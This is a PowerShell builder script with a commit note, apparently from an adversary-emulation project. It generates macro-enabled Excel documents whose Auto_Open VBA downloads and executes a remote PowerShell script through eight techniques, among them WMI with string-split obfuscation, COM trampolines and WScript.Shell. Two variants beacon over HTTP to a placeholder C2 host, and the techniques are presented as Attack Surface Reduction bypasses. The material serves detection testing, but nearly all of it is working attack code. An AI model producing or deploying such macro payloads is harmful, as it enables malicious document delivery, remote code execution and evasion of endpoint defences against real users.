b51284297d
Adding the following: - New DragonsTail Chain reaction that does not execute Mimikatz. - Generic .HTA file with supporting markdown file highlighting details. - Generic `Atomic.doc` with supporting markdown file highlighting embedded macro. - Guide (markdown) explaining how to zip files to simulate email borne threats. - Simple guide on how to setup a "Listener" for C2 communication in Python and Powershell. - Generate-Macro.ps1 - Builder script that will generate 8 different macro embedded XLS files to simulate macro techniques actively being used.
#Adopted and Originally Coded by Matt Nelson (@enigma0x3)
|
|
#Reference: https://github.com/enigma0x3/Generate-Macro/blob/master/Generate-Macro.ps1
|
|
<#
|
|
.SYNOPSIS
|
|
|
|
Standalone PowerShell script that generates a macro-enabled Microsoft Excel document (.xls) carrying one of several download-and-execute VBA payloads chosen from a menu. No persistence mechanism is installed by the generated document; it only downloads and runs the selected chain reaction when opened with macros enabled.
|
|
|
|
.DESCRIPTION
|
|
|
|
This script will generate malicious Microsoft Excel Documents that contain VBA macros.
|
|
The script displays a menu of attacks, each using a different execution technique documented in the referenced ASR-bypass research. Once an attack is chosen, the matching macro is embedded in a new workbook, which is saved to the current user's Desktop.
|
|
|
|
When naming the document, don't include a file extension.
|
|
|
|
License: BSD 3-Clause
|
|
Required Dependencies: None
|
|
Optional Dependencies: None
|
|
|
|
.Attack Types
|
|
|
|
All 8 attacks represent different ASR bypasses based on research performed by great folks within the industry. All macros were adapted from https://gist.github.com/infosecn1nja/24a733c5b3f0e5a8b6f0ca2cf75967e3.
|
|
|
|
Additional references:
|
|
|
|
- https://www.darkoperator.com/blog/2017/11/11/windows-defender-exploit-guard-asr-rules-for-office
|
|
- https://www.darkoperator.com/blog/2017/11/6/windows-defender-exploit-guard-asr-vbscriptjs-rule
|
|
- https://www.darkoperator.com/blog/2017/11/8/windows-defender-exploit-guard-asr-obfuscated-script-rule
|
|
- https://posts.specterops.io/the-emet-attack-surface-reduction-replacement-in-windows-10-rs3-the-good-the-bad-and-the-ugly-34d5a253f3df
|
|
- https://oddvar.moe/2018/03/15/windows-defender-attack-surface-reduction-rules-bypass/
|
|
|
|
.EXAMPLE
|
|
|
|
PS> ./Generate-Macro.ps1
|
|
Enter the name of the document (Do not include a file extension): FinancialData
|
|
|
|
--------Select Attack---------
|
|
1. Chain Reaction Download and execute with Excel.
|
|
2. Chain Reaction Download and execute with Excel, wmiprvse
|
|
3. Chain Reaction Download and execute with Excel, wmiprvse benign
|
|
4. Chain Reaction Download and execute with Excel Shell
|
|
5. Chain Reaction Download and execute with Excel ShellBrowserWindow
|
|
6. Chain Reaction Download and execute with Excel WshShell
|
|
7. Chain Reaction Download and execute with Excel and POST C2.
|
|
8. Chain Reaction Download and execute with Excel and GET C2.
|
|
------------------------------
|
|
|
|
Saved to file C:\Users\Malware\Desktop\FinancialData.xls
|
|
PS>
|
|
|
|
#>
|
|
|
|
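# Output location for the generated workbook: the operator's own Desktop.
$global:defLoc = "$env:userprofile\Desktop"

# The document name is typed by the operator; the .xls extension is appended below.
$global:Name = Read-Host "Enter the name of the document (Do not include a file extension)"

# Reject empty names and anything that is not a bare file name (path separators, ':', wildcards, ...),
# so the workbook can only land in $global:defLoc and never somewhere else on disk.
$invalidChars = [System.IO.Path]::GetInvalidFileNameChars()
if (-not $global:Name -or $global:Name.Trim().Length -eq 0 -or $global:Name.IndexOfAny($invalidChars) -ge 0) {
    throw "Document name must be a plain file name without path separators or other characters that are invalid in file names."
}

$global:Name = $global:Name + ".xls"
$global:FullName = "$global:defLoc\$global:Name"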
|
|
|
|
|
|
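# NOTE(review): every payload below fetches its chain reaction from the atomic-red-team *master* branch at
# document-open time. Nothing is pinned or hash-checked, so what executes on the target is whatever that
# URL serves on the day the document is opened. Pin to a commit SHA (or host the script yourself) when the
# exercise needs to be reproducible or reviewed in advance.

function Write-MacroWorkbook {
<#
.SYNOPSIS
Builds an Excel 97-2003 workbook (.xls) containing the supplied VBA module and saves it to -Path.

.DESCRIPTION
Shared by all attack functions in this file. It:
  1. records the current HKCU Excel security values (AccessVBOM, VBAWarnings),
  2. sets both to 1 so the VBA project can be edited programmatically,
  3. drives a hidden Excel COM instance to add a standard module with the macro and save the workbook,
  4. in a finally block, tears Excel down, restores the original registry values (removing them if they
     did not exist before) and stops only the Excel process this function created.

Host-impact notes for the operator:
  - Step 2 changes the build host's own Office trust settings for the duration of the call. The previous
    version of this file wrote 0 afterwards instead of restoring the prior value, and skipped the restore
    entirely if anything between the two writes threw (Excel not installed, VBProject access refused by
    policy, save failure), leaving macros enabled on the build host.
  - If Group Policy locks AccessVBOM (HKLM or the Policies hive), the HKCU write has no effect and the
    VBProject access throws "Programmatic access to Visual Basic Project is not trusted"; cleanup still runs.
  - Only Excel processes that did not exist when the function started are stopped. The previous version
    killed every excel.exe on the host, including the operator's own open workbooks.
  - Alerts are kept off for the whole session: a prompt (for example "file already exists") inside an
    invisible Excel would hang the script. The previous version re-enabled them by assigning the Word
    constant name "wdAlertsNone" as a string, which PowerShell coerces to $true; that line is dropped.
  - The literal 56 is XlFileFormat.xlExcel8 (Excel 97-2003 workbook, macro-capable); using it removes the
    hard dependency on the Microsoft.Office.Interop.Excel assembly that Add-Type previously required.

.PARAMETER MacroCode
VBA source text for a standard module. An Auto_Open procedure in it runs when the workbook is opened with
macros enabled.

.PARAMETER Path
Full destination path of the workbook. Defaults to the name the operator entered at startup.

.OUTPUTS
Writes "Saved to file <path>" to the output stream on success.
#>
    param(
        [Parameter(Mandatory = $true)]
        [string]$MacroCode,

        [string]$Path = $global:FullName
    )

    $xlExcel8 = 56           # XlFileFormat.xlExcel8 (Excel 97-2003 workbook)
    $vbextStdModule = 1      # vbext_ComponentType.vbext_ct_StdModule
    $securityNames = 'AccessVBOM', 'VBAWarnings'

    # Excel PIDs that exist before we start; cleanup must not touch the operator's own workbooks.
    $preexisting = @(Get-Process -Name excel -ErrorAction SilentlyContinue | Select-Object -ExpandProperty Id)

    $excel = $null
    $workbook = $null
    $securityKey = $null
    $saved = @{}

    try {
        $excel = New-Object -ComObject "Excel.Application"
        $securityKey = "HKCU:\Software\Microsoft\Office\$($excel.Version)\Excel\Security"

        # Remember the current trust values so they can be put back exactly; $null means "did not exist".
        if (-not (Test-Path $securityKey)) { New-Item -Path $securityKey -Force | Out-Null }
        foreach ($name in $securityNames) {
            $saved[$name] = (Get-ItemProperty -Path $securityKey -Name $name -ErrorAction SilentlyContinue).$name
            New-ItemProperty -Path $securityKey -Name $name -PropertyType DWORD -Value 1 -Force | Out-Null
        }

        # Hidden, prompt-free instance (see the alerts note above).
        $excel.DisplayAlerts = $false
        $excel.Visible = $false

        # Workbooks.Add(1) is kept as in the original; it yields a single-sheet workbook in practice.
        $workbook = $excel.Workbooks.Add(1)
        $module = $workbook.VBProject.VBComponents.Add($vbextStdModule)
        $module.CodeModule.AddFromString($MacroCode)

        $workbook.SaveAs($Path, $xlExcel8)
        Write-Output "Saved to file $Path"
    }
    finally {
        # Best-effort COM teardown; a failure here must not mask the error that brought us here.
        try {
            if ($workbook) { $workbook.Close($false) }
            if ($excel) { $excel.Quit() }
        }
        catch { Write-Verbose "Excel teardown failed: $_" }
        if ($excel) {
            [System.Runtime.InteropServices.Marshal]::ReleaseComObject($excel) | Out-Null
            $excel = $null
        }

        # Restore the trust settings exactly as found (only the ones we actually changed).
        if ($securityKey) {
            foreach ($name in $saved.Keys) {
                if ($null -eq $saved[$name]) {
                    Remove-ItemProperty -Path $securityKey -Name $name -ErrorAction SilentlyContinue
                }
                else {
                    Set-ItemProperty -Path $securityKey -Name $name -Value $saved[$name]
                }
            }
        }

        # Stop only the Excel instance(s) created during this call.
        Get-Process -Name excel -ErrorAction SilentlyContinue |
            Where-Object { $preexisting -notcontains $_.Id } |
            Stop-Process -Force -ErrorAction SilentlyContinue
    }
}

function Excel-Shell {
<#
.SYNOPSIS
Standard macro execution (menu option 4).

.DESCRIPTION
Upon execution, the VBA Shell() function spawns cmd.exe, which runs powershell.exe to download and
execute the DragonsTail chain reaction. Expect cmd.exe to appear as a direct child of excel.exe.
#>
    $Code = @"
Sub Auto_Open()
Call Shell("cmd.exe /c powershell.exe IEX ( IWR -uri 'https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/chain_reaction_DragonsTail.ps1')", 1)
End Sub
"@
    Write-MacroWorkbook -MacroCode $Code
}

function Excel-Com-Wmiprvse-Benign-Trampoline {
<#
.SYNOPSIS
Uses WMI (Win32_Process.Create) to download and execute the benign chain reaction (menu option 3).
This version does not execute Mimikatz.

.DESCRIPTION
Upon macro execution the process is created through WMI, so cmd.exe is spawned by WmiPrvSE.exe rather
than by Excel. The "winmgmts" / "Win32_Process" strings are assembled by concatenation, presumably to
avoid simple string signatures on the macro text.
#>
    $Code = @"
Sub Auto_Open()
Const HIDDEN_WINDOW = 0
strComputer = "."
Set objWMIService = GetObject("win" & "mgmts" & ":\\" & strComputer & "\root" & "\cimv2")
Set objStartup = objWMIService.Get("Win32_" & "Process" & "Startup")
Set objConfig = objStartup.SpawnInstance_
objConfig.ShowWindow = HIDDEN_WINDOW
Set objProcess = GetObject("winmgmts:\\" & strComputer & "\root" & "\cimv2" & ":Win32_" & "Process")
objProcess.Create "cmd.exe /c powershell.exe IEX ( IWR -uri 'https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/chain_reaction_DragonsTail_benign.ps1')", Null, objConfig, intProcessID
End Sub
"@
    Write-MacroWorkbook -MacroCode $Code
}

function Excel-Com-Wmiprvse-Trampoline {
<#
.SYNOPSIS
Uses WMI (Win32_Process.Create) to download and execute the full DragonsTail chain reaction (menu option 2).

.DESCRIPTION
Same technique as the benign variant, but the downloaded script is chain_reaction_DragonsTail.ps1 (the
non-benign one). cmd.exe is spawned by WmiPrvSE.exe rather than by Excel.
#>
    $Code = @"
Sub Auto_Open()
Const HIDDEN_WINDOW = 0
strComputer = "."
Set objWMIService = GetObject("win" & "mgmts" & ":\\" & strComputer & "\root" & "\cimv2")
Set objStartup = objWMIService.Get("Win32_" & "Process" & "Startup")
Set objConfig = objStartup.SpawnInstance_
objConfig.ShowWindow = HIDDEN_WINDOW
Set objProcess = GetObject("winmgmts:\\" & strComputer & "\root" & "\cimv2" & ":Win32_" & "Process")
objProcess.Create "cmd.exe /c powershell.exe IEX ( IWR -uri 'https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/chain_reaction_DragonsTail.ps1')", Null, objConfig, intProcessID
End Sub
"@
    Write-MacroWorkbook -MacroCode $Code
}

function Excel-Com-Trampoline {
<#
.SYNOPSIS
Excel COM trampoline via the ShellWindows object (menu option 1).

.DESCRIPTION
The macro instantiates the ShellWindows COM class by CLSID and calls ShellExecute on it, so the child
cmd.exe is expected to be created by the out-of-process shell host (explorer.exe) rather than by Excel;
confirm the parent in your telemetry. powershell.exe downloads the chain reaction to
~\Documents\payload.bat and then runs that file.

NOTE(review): the downloaded content is a PowerShell script but it is written to a .bat file and invoked
as one, so cmd.exe rather than PowerShell will interpret it. Verify on a test host that this payload
actually executes the chain reaction; if not, run the file through powershell.exe instead.
#>
    $Code = @"
Sub Auto_Open()
Const ShellWindows = _
"{9BA05972-F6A8-11CF-A442-00A0C90A8F39}"
Set SW = GetObject("new:" & ShellWindows).Item()
SW.Document.Application.ShellExecute "cmd.exe", "/c powershell.exe IWR -uri ""https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/chain_reaction_DragonsTail.ps1"" -OutFile ""~\Documents\payload.bat"" ; ~\Documents\payload.bat", "C:\Windows\System32", Null, 0
End Sub
"@
    Write-MacroWorkbook -MacroCode $Code
}

function Excel-Com-ShellBrowserWindow {
<#
.SYNOPSIS
Excel COM trampoline via the ShellBrowserWindow object (menu option 5).

.DESCRIPTION
Same shape as the ShellWindows trampoline but using the ShellBrowserWindow CLSID. The child cmd.exe is
expected to be created by explorer.exe rather than by Excel; confirm the parent in your telemetry.
powershell.exe downloads the chain reaction to ~\Documents\payload.bat and then runs that file.

NOTE(review): as with Excel-Com-Trampoline, a PowerShell script is saved and invoked as a .bat; verify
that the payload really executes before relying on this option.
#>
    $Code = @"
Sub Auto_Open()
Const ShellBrowserWindow = _
"{C08AFD90-F2A1-11D1-8455-00A0C91F3880}"
Set SBW = GetObject("new:" & ShellBrowserWindow)
SBW.Document.Application.ShellExecute "cmd.exe", "/c powershell.exe IWR -uri ""https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/chain_reaction_DragonsTail.ps1"" -OutFile ""~\Documents\payload.bat"" ; ~\Documents\payload.bat", "C:\Windows\System32", Null, 0
End Sub
"@
    Write-MacroWorkbook -MacroCode $Code
}

function Excel-Com-wshshell {
<#
.SYNOPSIS
Excel COM WshShell execution (menu option 6).

.DESCRIPTION
The macro creates a WScript.Shell object and calls Exec to start cmd.exe, which runs powershell.exe to
download and execute the DragonsTail chain reaction. WScript.Shell is an in-process COM server, so the
child cmd.exe is expected to appear under excel.exe; confirm in your telemetry.
#>
    $Code = @"
Sub Auto_Open()
Set WshShell = CreateObject("WScript.Shell")
Set WshShellExec = WshShell.Exec("cmd.exe /c powershell.exe IEX ( IWR -uri 'https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/chain_reaction_DragonsTail.ps1')")
End Sub
"@
    Write-MacroWorkbook -MacroCode $Code
}

function Excel-Shell-C2-GET {
<#
.SYNOPSIS
Standard macro execution followed by an HTTP GET beacon (menu option 8).

.DESCRIPTION
Auto_Open first calls Execute (VBA Shell() -> cmd.exe -> powershell.exe downloading the DragonsTail chain
reaction), then C2, which sends a synchronous GET with a spoofed MSIE 6.0 User-Agent and the body
"ART=AtomicRedTeam" using WinHttp.WinHttpRequest.5.1.

Operator notes: the URL is the placeholder http://www.example.com and must be replaced with your
listener (see the C2 listener guide). The beacon is cleartext HTTP. Shell() returns immediately, so the
beacon is sent while the chain reaction is still starting.
#>
    $Code = @"
Sub Auto_Open()
Execute
C2
End Sub
Public Function Execute() As Variant
Call Shell("cmd.exe /c powershell.exe IEX ( IWR -uri 'https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/chain_reaction_DragonsTail.ps1')", 1)
End Function
Public Function C2() As Variant
Set objHTTP = CreateObject("WinHttp.WinHttpRequest.5.1")
URL = "http://www.example.com"
objHTTP.Open "GET", URL, False
objHTTP.setRequestHeader "User-Agent", "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
objHTTP.setRequestHeader "Content-type", "application/x-www-form-urlencoded"
objHTTP.send ("ART=AtomicRedTeam")
End Function
"@
    Write-MacroWorkbook -MacroCode $Code
}

function Excel-Shell-C2-POST {
<#
.SYNOPSIS
Standard macro execution followed by an HTTP POST beacon (menu option 7).

.DESCRIPTION
Identical to Excel-Shell-C2-GET except that the beacon is a POST and the User-Agent string differs
("Mozilla (compatible; MSIE 6.0; Windows NT 5.0)"), which is useful for writing two distinct detections.

Operator notes: replace the placeholder http://www.example.com with your listener; the beacon is
cleartext HTTP.
#>
    $Code = @"
Sub Auto_Open()
Execute
C2
End Sub
Public Function Execute() As Variant
Call Shell("cmd.exe /c powershell.exe IEX ( IWR -uri 'https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/chain_reaction_DragonsTail.ps1')", 1)
End Function
Public Function C2() As Variant
Set objHTTP = CreateObject("WinHttp.WinHttpRequest.5.1")
URL = "http://www.example.com"
objHTTP.Open "POST", URL, False
objHTTP.setRequestHeader "User-Agent", "Mozilla (compatible; MSIE 6.0; Windows NT 5.0)"
objHTTP.setRequestHeader "Content-type", "application/x-www-form-urlencoded"
objHTTP.send ("ART=AtomicRedTeam")
End Function
"@
    Write-MacroWorkbook -MacroCode $Code
}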
|
|
|
|
#Determine Attack

# Menu number -> attack function. Keys are strings because Read-Host returns a string.
$attacks = @{
    '1' = { Excel-Com-Trampoline }                  # ShellWindows COM trampoline
    '2' = { Excel-Com-Wmiprvse-Trampoline }         # WMI Win32_Process.Create (full chain reaction)
    '3' = { Excel-Com-Wmiprvse-Benign-Trampoline }  # WMI Win32_Process.Create (benign chain reaction)
    '4' = { Excel-Shell }                           # VBA Shell()
    '5' = { Excel-Com-ShellBrowserWindow }          # ShellBrowserWindow COM trampoline
    '6' = { Excel-Com-wshshell }                    # WScript.Shell.Exec
    '7' = { Excel-Shell-C2-POST }                   # VBA Shell() plus HTTP POST beacon
    '8' = { Excel-Shell-C2-GET }                    # VBA Shell() plus HTTP GET beacon
}

# Show the menu and re-prompt until one of the eight menu numbers is entered.
while ($true) {
    Write-Host "
--------Select Attack---------
1. Chain Reaction Download and execute with Excel.
2. Chain Reaction Download and execute with Excel, wmiprvse
3. Chain Reaction Download and execute with Excel, wmiprvse benign
4. Chain Reaction Download and execute with Excel Shell
5. Chain Reaction Download and execute with Excel ShellBrowserWindow
6. Chain Reaction Download and execute with Excel WshShell
7. Chain Reaction Download and execute with Excel and POST C2.
8. Chain Reaction Download and execute with Excel and GET C2.
------------------------------"
    $AttackNum = Read-Host -prompt "Select Attack Number & Press Enter"
    if ($attacks.ContainsKey([string]$AttackNum)) { break }
}

#Initiate Attack Choice
& $attacks[$AttackNum]
|